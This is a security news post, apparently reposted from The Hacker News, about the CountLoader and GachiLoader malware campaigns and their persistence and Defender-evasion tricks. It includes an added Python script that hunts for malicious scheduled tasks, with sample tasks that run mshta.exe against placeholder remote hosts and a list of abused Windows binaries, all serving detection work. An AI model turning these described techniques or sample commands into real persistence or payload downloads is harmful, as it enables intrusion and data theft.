Cyber Web Spider Blog – News
Cracked Software and YouTube Videos Spread CountLoader and GachiLoader Malware

Posted on December 19, 2025 by CWS

Cybersecurity researchers have disclosed details of a new campaign that has used cracked software distribution sites as a distribution vector for a new version of a modular and stealthy loader known as CountLoader.
The campaign "uses CountLoader as the initial tool in a multistage attack for access, evasion, and delivery of additional malware families," the Cyderes Howler Cell Threat Intelligence team said in an analysis.
CountLoader was previously documented by both Fortinet and Silent Push, detailing the loader's ability to push payloads like Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, and PureMiner. The loader has been detected in the wild since at least June 2025.
The latest attack chain begins when unsuspecting users attempt to download cracked versions of legitimate software like Microsoft Word and are redirected to a MediaFire link hosting a malicious ZIP archive. That archive contains an encrypted ZIP file and a Microsoft Word document with the password needed to open the second archive.

Present within the ZIP file is a renamed legitimate Python interpreter ("Setup.exe") that has been configured to execute a malicious command to retrieve CountLoader 3.2 from a remote server using "mshta.exe."

To establish persistence, the malware creates a scheduled task that mimics Google by using the name "GoogleTaskSystem136.0.7023.12" along with an identifier-like string. It is configured to run every 30 minutes for 10 years by invoking "mshta.exe" with a fallback domain.
It also checks whether CrowdStrike's Falcon security tool is installed on the host by querying the antivirus directory via Windows Management Instrumentation (WMI). If the service is detected, the persistence command is tweaked to "cmd.exe /c start /b mshta.exe ." Otherwise, it directly reaches out to the URL using "mshta.exe."
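The persistence traits described above (a Google-branded task name, a 30-minute repetition over ten years, mshta.exe launched directly or behind "cmd.exe /c start /b") can be hunted for in exported Task Scheduler XML. The script below is an added example written for this page, not Cyderes' or The Hacker News' code; the task definitions, domains and the "{PLACEHOLDER-ID-n}" suffixes are constructed, not real indicators.

```python
"""Hunt exported Task Scheduler XML for CountLoader-style persistence.
Constructed example modelled on the article: Google-mimicking task name, 30-minute
repetition for ten years, mshta.exe run directly or via "cmd.exe /c start /b"."""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
LOLBINS = ("mshta.exe", "powershell.exe", "rundll32.exe")  # binaries the loader chains to
URL_RE = re.compile(r"https?://\S+", re.I)

def parse_task(xml_text):
    """Extract the Exec action and repetition settings from one task definition."""
    root = ET.fromstring(xml_text)
    ex = root.find(".//t:Actions/t:Exec", NS)
    return {
        "command": ex.findtext("t:Command", "", NS) if ex is not None else "",
        "arguments": ex.findtext("t:Arguments", "", NS) if ex is not None else "",
        "interval": root.findtext(".//t:Repetition/t:Interval", "", NS),
        "duration": root.findtext(".//t:Repetition/t:Duration", "", NS),
    }

def indicators(name, task):
    """Return the indicators that fire for one scheduled task (empty if benign)."""
    hits, cmdline = [], f"{task['command']} {task['arguments']}".lower()
    if any(b in cmdline for b in LOLBINS) and URL_RE.search(cmdline):
        hits.append("LOLBin launched against a remote URL")
    if "cmd.exe" in cmdline and "start /b" in cmdline:
        hits.append("payload wrapped in 'cmd.exe /c start /b' (EDR-aware variant)")
    if name.lower().startswith("google") and "\\google\\" not in cmdline:
        hits.append("Google-branded task not running from Google's install path")
    m = re.fullmatch(r"PT(\d+)M", task["interval"])  # minute-only intervals, e.g. PT30M
    if m and int(m.group(1)) <= 30 and re.search(r"P\d+Y", task["duration"]):
        hits.append("sub-hourly repetition for years (beaconing pattern)")
    return hits

def hunt(tasks):
    """Map task name -> fired indicators for every task in {name: xml} that fires."""
    found = {n: indicators(n, parse_task(x)) for n, x in tasks.items()}
    return {n: h for n, h in found.items() if h}

def _task_xml(command, arguments, interval, duration):  # minimal schema, constructed
    return (f'<Task xmlns="{NS["t"]}"><Triggers><TimeTrigger><Repetition>'
            f"<Interval>{interval}</Interval><Duration>{duration}</Duration>"
            f"</Repetition></TimeTrigger></Triggers><Actions><Exec><Command>{command}"
            f"</Command><Arguments>{arguments}</Arguments></Exec></Actions></Task>")

SAMPLE_TASKS = {  # first two mimic the article's description; third is a benign look-alike
    "GoogleTaskSystem136.0.7023.12{PLACEHOLDER-ID-1}": _task_xml(
        "mshta.exe", "https://loader.example.invalid/c", "PT30M", "P10Y"),
    "GoogleTaskSystem136.0.7023.12{PLACEHOLDER-ID-2}": _task_xml(
        "cmd.exe", "/c start /b mshta.exe https://fallback.example.invalid/c", "PT30M", "P10Y"),
    "GoogleUpdateTaskMachineUA": _task_xml(
        r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe", "/ua", "PT1H", "P1D"),
}
```

Calling `hunt(SAMPLE_TASKS)` flags only the two mimicking tasks; on a live host, feed it the output of `schtasks /query /xml` per task instead of the constructed samples.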

CountLoader is equipped to profile the compromised host and fetch the next-stage payload. The latest version of the malware adds capabilities to propagate via removable USB drives and execute the malware directly in memory via "mshta.exe" or PowerShell. The full list of supported features is as follows:

  • Download an executable from a provided URL and execute it
  • Download a ZIP archive from a provided URL and execute either a Python-based module or an EXE file present within it
  • Download a DLL from a provided URL and run it via "rundll32.exe"
  • Download an MSI installer package and install it
  • Remove a scheduled task used by the loader
  • Collect and exfiltrate extensive system information
  • Spread via removable media by creating malicious shortcuts (LNK) next to their hidden legitimate counterparts that, when launched, execute the original file and run the malware via "mshta.exe" with a C2 parameter
  • Directly launch "mshta.exe" against a provided URL
  • Execute a remote PowerShell payload in memory

In the attack chain observed by Cyderes, the final payload deployed by CountLoader is an information stealer known as ACR Stealer, which is equipped to harvest sensitive data from infected hosts.
"This campaign highlights CountLoader's ongoing evolution and increased sophistication, reinforcing the need for proactive detection and layered defense strategies," Cyderes said. "Its ability to deliver ACR Stealer through a multi-stage process ranging from Python library tampering to in-memory shellcode unpacking highlights a growing trend of signed binary abuse and fileless execution tactics."
YouTube Ghost Network Delivers GachiLoader
The disclosure comes as Check Point disclosed details of a new, heavily obfuscated JavaScript malware loader dubbed GachiLoader that is written in Node.js. The malware is distributed via the YouTube Ghost Network, a network of compromised YouTube accounts that engage in malware distribution.

"One variant of GachiLoader deploys a second-stage malware, Kidkadi, that implements a novel technique for Portable Executable (PE) injection," security researchers Sven Rath and Jaromír Hořejší said. "This technique loads a legitimate DLL and abuses Vectored Exception Handling to replace it on-the-fly with a malicious payload."
As many as 100 YouTube videos have been flagged as part of the campaign, amassing roughly 220,000 views. These videos were uploaded from 39 compromised accounts, with the first video dating back to December 22, 2024. A majority of these videos have since been taken down by Google.

In at least one case, GachiLoader has served as a conduit for the Rhadamanthys information stealer malware. Like other loaders, GachiLoader is used to deploy additional payloads to an infected machine, while simultaneously performing a series of anti-analysis checks to fly under the radar.
It also checks whether it is running in an elevated context by running the "net session" command. If the execution fails, it attempts to restart itself with admin privileges, which in turn triggers a User Account Control (UAC) prompt. There is a high chance the victim will allow it to proceed, since the malware is likely to be distributed via fake installers for popular software, as outlined in the case of CountLoader.

In the last phase, the malware attempts to kill "SecHealthUI.exe," a process associated with Microsoft Defender, and configures Defender exclusions to prevent the security solution from flagging malicious payloads staged in certain folders (e.g., C:\Users, C:\ProgramData, and C:\Windows).
GachiLoader then proceeds to either directly fetch the final payload from a remote URL or employ another loader named "kidkadi.node," which then loads the main malware by abusing Vectored Exception Handling.
"The threat actor behind GachiLoader demonstrated proficiency with Windows internals, coming up with a new variation of a known technique," Check Point said. "This highlights the need for security researchers to stay up-to-date with malware techniques such as PE injections and to proactively look for new ways in which malware authors try to evade detection."

Category: The Hacker News. Tags: CountLoader, Cracked, GachiLoader, Malware, Software, Spread, Videos, YouTube

Copyright © 2025 Cyber Web Spider Blog – News.